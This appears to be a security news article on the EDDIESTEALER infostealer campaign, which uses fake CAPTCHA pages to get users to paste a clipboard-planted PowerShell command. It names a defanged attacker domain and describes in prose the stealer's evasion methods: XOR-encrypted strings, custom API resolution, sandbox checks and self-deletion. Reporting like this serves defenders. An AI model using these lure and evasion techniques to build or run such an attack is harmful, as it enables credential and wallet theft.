Cybersecurity researchers have uncovered a sophisticated malware campaign leveraging deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer dubbed EDDIESTEALER.
This campaign represents a significant evolution in social engineering tactics, where threat actors exploit users’ familiarity with routine security verification processes to trick them into executing malicious code.
The malware employs an intricate multi-stage delivery mechanism that begins with compromised websites displaying convincing fake “I’m not a robot” verification screens, ultimately leading to the deployment of a powerful data-stealing tool capable of harvesting credentials, browser information, and cryptocurrency wallet details.
.png
)
The attack vector demonstrates remarkable sophistication in its execution methodology. Initial access occurs through compromised websites that deploy obfuscated React-based JavaScript payloads, presenting users with what appears to be a legitimate Google reCAPTCHA verification interface.
These fake verification screens instruct users to perform seemingly innocuous actions: pressing Windows Key + R to open the Run dialog, followed by Ctrl + V to paste clipboard contents, and finally Enter to execute the command.
Unbeknownst to the victim, the malicious JavaScript has already copied a PowerShell command to their clipboard using the document.execCommand(“copy”) method.
Elastic Security Labs analysts identified this emerging threat through comprehensive telemetry analysis, discovering that the campaign leverages a sophisticated command structure that silently downloads secondary payloads from attacker-controlled infrastructure.
The PowerShell command automatically retrieves a JavaScript file named “gverify.js” from domains such as hxxps://1111.fit/version/, which subsequently downloads the main EDDIESTEALER executable with a pseudorandomly generated 12-character filename.
This multi-layered approach effectively obscures the true nature of the attack while maintaining the appearance of legitimate system verification processes.
.webp)
The malware’s impact extends far beyond simple credential theft, targeting a comprehensive range of sensitive data including cryptocurrency wallets, browser stored credentials, password manager databases, FTP client configurations, and messaging applications.
EDDIESTEALER demonstrates particular sophistication in its approach to modern browser security, implementing techniques similar to ChromeKatz to bypass Application-bound encryption protections introduced in recent Chrome versions.
.webp)
The malware’s ability to adapt to evolving security measures highlights the persistent threat posed by well-resourced cybercriminal organizations.
Advanced Evasion and Persistence Mechanisms
EDDIESTEALER employs multiple layers of obfuscation and evasion techniques that distinguish it from conventional infostealers.
The malware utilizes extensive string encryption through XOR ciphers, with each decryption routine employing distinct key derivation functions that accept binary addresses and 4-byte constants to calculate XOR key locations.
This approach significantly complicates static analysis efforts, as researchers must reverse-engineer multiple custom decryption algorithms to extract meaningful artifacts.
The malware implements sophisticated API obfuscation through a custom Windows API lookup mechanism. Rather than relying on standard import tables, EDDIESTEALER dynamically resolves function addresses by maintaining a local hashtable of previously resolved API calls.
When a new function is required, the malware employs custom LoadLibrary and GetProcAddress implementations to retrieve addresses, subsequently caching them for future use.
This technique effectively evades signature-based detection systems that rely on import table analysis.
EDDIESTEALER incorporates multiple anti-analysis features, including memory-based sandbox detection that evaluates total physical memory to determine if the system meets minimum requirements of approximately 4.0 GB.
Additionally, newer variants suggest server-side profiling capabilities, where the command and control infrastructure can assess client environments and withhold malicious payloads when sandbox or analysis systems are detected.
The malware also implements self-deletion capabilities using NTFS Alternate Data Streams renaming techniques, similar to those observed in LATRODECTUS campaigns, enabling the executable to remove itself from disk while bypassing file lock restrictions.
Celebrate 9 years of ANY.RUN! Unlock the full power of TI Lookup plan (100/300/600/1,000+ search requests), and your request quota will double.
